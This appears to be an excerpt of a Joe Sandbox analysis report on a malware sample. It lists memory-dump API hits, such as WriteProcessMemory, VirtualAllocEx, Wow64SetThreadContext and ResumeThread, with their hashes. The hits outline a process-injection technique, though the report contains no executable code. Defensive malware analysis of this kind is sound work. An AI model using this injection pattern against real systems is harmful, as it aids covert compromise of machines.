                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CA0F78
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: bf0ea322f5a9d64584c5f0947dd06b018bed84b7b483b8238ffc6a6144693763
                                                                        • Instruction ID: d324c6a4898c98c1b905bd0f6804e311f113d21d2841f656483d77c96ae0206d
                                                                        • Opcode Fuzzy Hash: bf0ea322f5a9d64584c5f0947dd06b018bed84b7b483b8238ffc6a6144693763
                                                                        • Instruction Fuzzy Hash: 102146B19003499FDF10CFA9C885BDEBBF5FF48324F10842AE918A7240D7799940CBA5
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CA0F78
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: ddef9fbfaec065bebf98ca83d0c7d48dac4e024581d4ce9f52c8a88cfaf35876
                                                                        • Instruction ID: e0f1b498caaefe41cc15f6b980fa1c6cde6cbc5206be8ccd916cb8eddcadcbfb
                                                                        • Opcode Fuzzy Hash: ddef9fbfaec065bebf98ca83d0c7d48dac4e024581d4ce9f52c8a88cfaf35876
                                                                        • Instruction Fuzzy Hash: 4C2127719003499FDB10CFA9C885BDEBBF5FF48324F10842AE918A7240D7799944CBA5
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CA1058
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 2e61d44c075279444ba0a171901cfe629d6718dbe227e72f5525eaacfd2059a6
                                                                        • Instruction ID: d66099ecf290bfc5dd802646899a50cbc21c82529c2c8efe4a3c6f34d3c9a5c4
                                                                        • Opcode Fuzzy Hash: 2e61d44c075279444ba0a171901cfe629d6718dbe227e72f5525eaacfd2059a6
                                                                        • Instruction Fuzzy Hash: B32139B1D003599FDB10CFAAC881AEEFBF5FF48320F54842AE558A7240D7799911CBA5
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CA0DCE
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 4f5a4711c2860a36d2f45d2ada5e2022875c269b4f9e3f0caa72e78b08922708
                                                                        • Instruction ID: 5d41602ece168dbf73412572eb778d173af9cd300f3da236ef9a68d8cc6914ed
                                                                        • Opcode Fuzzy Hash: 4f5a4711c2860a36d2f45d2ada5e2022875c269b4f9e3f0caa72e78b08922708
                                                                        • Instruction Fuzzy Hash: BD213A72D003098FDB10CFAAC4857EEBBF4EF98324F54842AD459A7240D779A945CFA5
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0094D616,?,?,?,?,?), ref: 0094D6D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 1ad4b07d31e2fb85c1d9333019ca9ad189f6dd9c92454c9424bce47d912fb28d
                                                                        • Instruction ID: a0625de7b187a82448cd1c10c4c0221fcb7556b6445a80db69da005165a3bb7f
                                                                        • Opcode Fuzzy Hash: 1ad4b07d31e2fb85c1d9333019ca9ad189f6dd9c92454c9424bce47d912fb28d
                                                                        • Instruction Fuzzy Hash: 3221E6B5901248DFDB10CF9AD884ADEFBF8FB48320F14841AE918A7310D375A950CFA5
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CA1058
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: b8e773b6cb9147d580248332105c3e01706ead9a76b4d16c82f521bf3ad583cc
                                                                        • Instruction ID: 05fa387c2100d7a5757bbe80a4d4880dfad81ff85a57859947438ebc7c90bf46
                                                                        • Opcode Fuzzy Hash: b8e773b6cb9147d580248332105c3e01706ead9a76b4d16c82f521bf3ad583cc
                                                                        • Instruction Fuzzy Hash: BC2137B1D003499FDB10CFAAC880AEEFBF5FF48320F14842AE518A7240C7799910CBA1
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CA0DCE
Memory Dump Source
• Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0094D616,?,?,?,?,?), ref: 0094D6D7
Memory Dump Source
• Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
Strings
Memory Dump Source
• Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CA0E96
Memory Dump Source
• Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CA0E96
Memory Dump Source
• Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
Memory Dump Source
• Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
Memory Dump Source
• Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0094AFBE
Memory Dump Source
• Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• PostMessageW.USER32(?,?,?,?), ref: 06CA479D
Memory Dump Source
• Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• PostMessageW.USER32(?,?,?,?), ref: 06CA479D
Memory Dump Source
• Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Strings
Memory Dump Source
• Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: LRtq
• API String ID: 0-4092542751
Strings
Memory Dump Source
• Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: Tetq
• API String ID: 0-1197912954
Strings
Memory Dump Source
• Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: 8xq
• API String ID: 0-3139237302
Strings
Memory Dump Source
• Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: 8xq
• API String ID: 0-3139237302
Strings
Memory Dump Source
• Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: Tetq
• API String ID: 0-1197912954
Strings
Memory Dump Source
• Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: Tetq
• API String ID: 0-1197912954
Strings
Memory Dump Source
• Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: Tetq
• API String ID: 0-1197912954
Strings
Memory Dump Source
• Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: Tetq
• API String ID: 0-1197912954
Strings
Memory Dump Source
• Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: Tetq
• API String ID: 0-1197912954
Strings
Memory Dump Source
• Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: m
• API String ID: 0-3775001192
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6
                                                                        • API String ID: 0-498629140
                                                                        • Opcode ID: 423b11d22c43e865c4ee294d1da25bf4fd9008caba1b99b155a4a9702fbfcb55
                                                                        • Instruction ID: f7aa123fdb261986bd54aa9885f63b857c8223a07220e05a6b6daaaf902daefd
                                                                        • Opcode Fuzzy Hash: 423b11d22c43e865c4ee294d1da25bf4fd9008caba1b99b155a4a9702fbfcb55
                                                                        • Instruction Fuzzy Hash: CEE0C230C06208EBDF10EFB4D4082BDFBF8E705301F104599C80A9B240EB355E42D785
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7
                                                                        • API String ID: 0-1790921346
                                                                        • Opcode ID: 39068bd64d94483ef00cad36765d8c2230625ee7e91c478eefd00084958121c8
                                                                        • Instruction ID: 2115e033ec27eaa39e901e46dada11f9d80fe3f3f2841697eee420d3cdb01ad7
                                                                        • Opcode Fuzzy Hash: 39068bd64d94483ef00cad36765d8c2230625ee7e91c478eefd00084958121c8
                                                                        • Instruction Fuzzy Hash: CCE0C270C4610CEBDB50FFB9E5046AD7BF8E748300F4005A8C4065B240D7391E45C681
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9b7a79596b1accac91f99a5804a9c4e910f987230f710adbeb972f90f85e04f8
                                                                        • Instruction ID: 20d4dc6423172749a0fdf1bc6b890f869f9706ec313999fd158af3b7a14781e4
                                                                        • Opcode Fuzzy Hash: 9b7a79596b1accac91f99a5804a9c4e910f987230f710adbeb972f90f85e04f8
                                                                        • Instruction Fuzzy Hash: D2A12C70E15219CFEB44EFA9D440AEDBBB6FF88300F109615E419AB355DB30A946CF91
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d5a8f363cacbbe05dcfab9aff60f756366686e63544189ba7fa3df94f7e926aa
                                                                        • Instruction ID: 94afff4154900eccc792ec4bf31acbb44b838077893eb862fe1ce3996cf45e20
                                                                        • Opcode Fuzzy Hash: d5a8f363cacbbe05dcfab9aff60f756366686e63544189ba7fa3df94f7e926aa
                                                                        • Instruction Fuzzy Hash: 7E913B70E15219CFEB44EFA9D540AEDBBB6FF88300F108619E419AB355DB30AD46CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c1ba07fb513db894533af54fb4699f1d4dab08d6364b4d092d62c7232c5a063
                                                                        • Instruction ID: 98ec35913f01ff1ee535c52a214d04731d2123b07eacd3d08aff81462c57370c
                                                                        • Opcode Fuzzy Hash: 7c1ba07fb513db894533af54fb4699f1d4dab08d6364b4d092d62c7232c5a063
                                                                        • Instruction Fuzzy Hash: 5D819275E142198FDF51DFA8C880AAEBBF6EF49304F1094A9E819EB311D7319A46CF40
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b167be04f519acabff32cad762a1c3c7076e560baf9ca0727144320118f11bad
                                                                        • Instruction ID: 2ceea2c202a1efb115bfcbbff9c4a8657e96ee1a631e73f7bd528d0f7d6c50b7
                                                                        • Opcode Fuzzy Hash: b167be04f519acabff32cad762a1c3c7076e560baf9ca0727144320118f11bad
                                                                        • Instruction Fuzzy Hash: F651E2B1E043889FCB41DFA8D8505DEBFF5EF4A220F15849AD804DB212D7399906CB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 26eedd20cdffe893a9364c00e52f70f5600766624a5070c545a0edf0cb4db404
                                                                        • Instruction ID: 188c6e3cf069bd403a689f67817e0fcd8360907a06adaf8ea74e473e6f255489
                                                                        • Opcode Fuzzy Hash: 26eedd20cdffe893a9364c00e52f70f5600766624a5070c545a0edf0cb4db404
                                                                        • Instruction Fuzzy Hash: F041F874E10108DFDB44EFA9C480AAEB7F6EB89310F14856AE915EB344D739EA42CF51
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f95128fc6f81cf9b2dc92996624c6c51d32d5a1768f30b36d628df8696f18697
                                                                        • Instruction ID: e6b8e00c3e901e5ea1312411954d10e33156d307eb1d306c87698677a5dba1a9
                                                                        • Opcode Fuzzy Hash: f95128fc6f81cf9b2dc92996624c6c51d32d5a1768f30b36d628df8696f18697
                                                                        • Instruction Fuzzy Hash: E041C174E2120A9FDF44EFB9D8685AEBBF1EF49221F108429D815EB350EB34D941CB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d12739794113cb2e678a7b526713aa037aa53b1575885d9155c01f974bb26af2
                                                                        • Instruction ID: 6cfa84712025ff1a0586440a0f0c7b883959ab40db109db5a237eec8b913e97a
                                                                        • Opcode Fuzzy Hash: d12739794113cb2e678a7b526713aa037aa53b1575885d9155c01f974bb26af2
                                                                        • Instruction Fuzzy Hash: 05413B74E10208DFDB84EFA8C490A9EBBB2EB89314F14856AD915EB350DB39DD02CF51
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 20ffede82efc6a61b6f48d64ad6ba63ae52e1bcaa3d0c068bbb85e94c1e3e174
                                                                        • Instruction ID: 3bef614d62e6b46776dc5675a45bd2cadee418c0439591eda1150f6fd3b6431d
                                                                        • Opcode Fuzzy Hash: 20ffede82efc6a61b6f48d64ad6ba63ae52e1bcaa3d0c068bbb85e94c1e3e174
                                                                        • Instruction Fuzzy Hash: 442131B1A007114FDB51EF3D8D905FFBBB6EFC8260B05486AD458DF242EA30890687A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907585156.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_8dd000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7396bb054fca3d653078d29d54d08d7e3a9b6a2d0cd50c88ec463910f05c76cc
                                                                        • Instruction ID: 029bb5a3c4e9defe58fbfe1192141fbbeb2ec62f6730db8dd1e1b6a488ddc77e
                                                                        • Opcode Fuzzy Hash: 7396bb054fca3d653078d29d54d08d7e3a9b6a2d0cd50c88ec463910f05c76cc
                                                                        • Instruction Fuzzy Hash: E42106B1504304DFDB15DF14D9C0B26BF66FB98324F24C66AE9098B356C336E856C6A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 276bad2495a6cd695f5b1dcfdd3a5d8e1fb71e2385e2f114eca72cc8b7dcf200
                                                                        • Instruction ID: 37088cfa8293fd19469ac2f3af421a4bdbdaa23477941fc21f539ee435553843
                                                                        • Opcode Fuzzy Hash: 276bad2495a6cd695f5b1dcfdd3a5d8e1fb71e2385e2f114eca72cc8b7dcf200
                                                                        • Instruction Fuzzy Hash: F1313CB4E1121ADFDB40DFA9D5846AEBBF4EB48710F14846AE815FB340E7349A41CF60
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8713cb9a1a357d79fc0edba6e80b05e97f762ecf14c115ad17fd1fc228a88851
                                                                        • Instruction ID: 0885a2eb1da8e23a3e5d683744d5d6cade52221007bb1556854ade69570efadd
                                                                        • Opcode Fuzzy Hash: 8713cb9a1a357d79fc0edba6e80b05e97f762ecf14c115ad17fd1fc228a88851
                                                                        • Instruction Fuzzy Hash: 3A3194B4E1120A8FCB90DFB9D5846AEBBF0EF08304F10846AD824EB340E7349A41CF51
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907645622.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_8ed000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1e76caca80778924d467423b9d33910c17bb8f52900fe5f6469c17e7b21e8b83
                                                                        • Instruction ID: f68dac2e0d25b15569c4e71ef2e07a3932ca53bc0f0727f55dcd6850c37f86ca
                                                                        • Opcode Fuzzy Hash: 1e76caca80778924d467423b9d33910c17bb8f52900fe5f6469c17e7b21e8b83
                                                                        • Instruction Fuzzy Hash: 50210771504784DFDB14DF15D5C0B16BBA5FB89314F28C56DD9098B246C33BD80BCA61
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907645622.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_8ed000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6d4256fab75f1a9283123d8231a11a2da8f7a9a4cdb5d1ef89fa869f39b8c78
                                                                        • Instruction ID: 94e3394d2079d83341d27421c27e76bd433bd47f4acc7637c6c9a5b9bb8953a1
                                                                        • Opcode Fuzzy Hash: b6d4256fab75f1a9283123d8231a11a2da8f7a9a4cdb5d1ef89fa869f39b8c78
                                                                        • Instruction Fuzzy Hash: 1B212975504384DFDB05DF15D5C0B26BBA5FB89314F24C56DEA098F291C336E80ACA61
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 099c20586957fe2ed29b5d524740415bdbf4b2c0d9d77b5595ad6803d74dd5fc
                                                                        • Instruction ID: c7f57e76bf2f348cf281a7dd229553a69ee07975501a893f53cd90542e3ec555
                                                                        • Opcode Fuzzy Hash: 099c20586957fe2ed29b5d524740415bdbf4b2c0d9d77b5595ad6803d74dd5fc
                                                                        • Instruction Fuzzy Hash: 9331D3B0D01258DFDB60EF9AC589B9EBFF4EB48314F24805AE404BB250C7B59845CF95
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0255de2cd87ec691c9d6704addbc1462a53cd36c2dbb1ad8d238a89994e61c96
                                                                        • Instruction ID: d562d7c2a722d9691a741f1e606f25b4f5319d8921ecc03d10e840a77511f112
                                                                        • Opcode Fuzzy Hash: 0255de2cd87ec691c9d6704addbc1462a53cd36c2dbb1ad8d238a89994e61c96
                                                                        • Instruction Fuzzy Hash: 9331FDB0D01258DFEB60DF99C988B8EBBF5FB48314F24842AE408BB240C7B59845CF91
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907645622.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_8ed000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46908e250c763f7a9b6a5afa42f759de797a29fc2433a06234af8339bbd29e49
                                                                        • Instruction ID: a065d7d8127cd9f1056d00832ad31152427ef310e92299179caaf1b9f9362a88
                                                                        • Opcode Fuzzy Hash: 46908e250c763f7a9b6a5afa42f759de797a29fc2433a06234af8339bbd29e49
                                                                        • Instruction Fuzzy Hash: 20214F755087C09FDB12CF14D994B11BF71FB46314F28C5EAD8498B2A6C33A985ACB62
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 123bbbb5fc251af9fafec932ae3d59626913e4cd5292fa1d4345bef938647740
